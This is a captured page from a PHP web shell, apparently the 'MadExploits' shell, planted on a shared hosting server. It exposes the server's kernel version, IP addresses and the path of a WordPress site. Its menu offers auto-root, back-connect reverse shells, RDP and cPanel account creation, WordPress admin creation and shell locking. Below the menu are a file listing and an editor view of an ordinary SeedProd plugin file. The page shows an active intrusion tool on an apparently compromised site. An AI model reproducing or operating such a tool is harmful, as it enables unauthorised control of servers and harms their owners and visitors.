Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 52.14.12.61
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
besthealthsdeals.com /
wp-content /
plugins /
coming-soon /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
backwards
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
admin-bar-menu.php
3.95
KB
-rw-r--r--
bootstrap.php
20.46
KB
-rw-r--r--
class-seedprod-notifications.p...
9.63
KB
-rw-r--r--
class-seedprod-review.php
5.97
KB
-rw-r--r--
cpt.php
541
B
-rw-r--r--
edit_with_seedprod.php
21.61
KB
-rw-r--r--
functions-addons.php
17.51
KB
-rw-r--r--
functions-envira-gallaries.php
799
B
-rw-r--r--
functions-inline-help.php
5.3
KB
-rw-r--r--
functions-openai.php
16.53
KB
-rw-r--r--
functions-rafflepress.php
1.86
KB
-rw-r--r--
functions-seedprod-gallery.php
7
B
-rw-r--r--
functions-utils.php
258.71
KB
-rw-r--r--
functions-wpforms.php
1.6
KB
-rw-r--r--
import-cross-site-functions.ph...
3.2
KB
-rw-r--r--
license.php
5.43
KB
-rw-r--r--
load_controller.php
1.69
KB
-rw-r--r--
lpage.php
34.91
KB
-rw-r--r--
nestednavmenu.php
5.09
KB
-rw-r--r--
render-csp-mm.php
9.8
KB
-rw-r--r--
render-dynamic-tags.php
26.24
KB
-rw-r--r--
render-lp.php
1.15
KB
-rw-r--r--
routes.php
24.62
KB
-rw-r--r--
settings.php
4.9
KB
-rw-r--r--
setup-wizard.php
12.08
KB
-rw-r--r--
subscriber.php
2.63
KB
-rw-r--r--
theme-templates.php
39.34
KB
-rw-r--r--
wp-cli-functions.php
22.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load_controller.php
<?php // phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase // must load first require_once SEEDPROD_PLUGIN_PATH . 'app/functions-utils.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/cpt.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/admin-bar-menu.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/class-seedprod-notifications.php'; // helper functions require_once SEEDPROD_PLUGIN_PATH . 'app/functions-inline-help.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/functions-wpforms.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/functions-rafflepress.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/functions-envira-gallaries.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/render-lp.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/render-csp-mm.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/nestednavmenu.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/setup-wizard.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/backwards/backwards_compatibility.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/subscriber.php'; add_action( 'plugins_loaded', array( 'SeedProd_Lite_Render', 'get_instance' ) ); add_action( 'plugins_loaded', array( 'SeedProd_Notifications', 'get_instance' ) ); if ( is_admin() ) { // Admin Only require_once SEEDPROD_PLUGIN_PATH . 'app/settings.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/lpage.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/edit_with_seedprod.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/functions-addons.php'; if ( 'lite' == SEEDPROD_BUILD ) { require_once SEEDPROD_PLUGIN_PATH . 'app/class-seedprod-review.php'; } } // Load on Public and Admin require_once SEEDPROD_PLUGIN_PATH . 'app/license.php'; require_once SEEDPROD_PLUGIN_PATH . 'app/includes/upgrade.php';
Close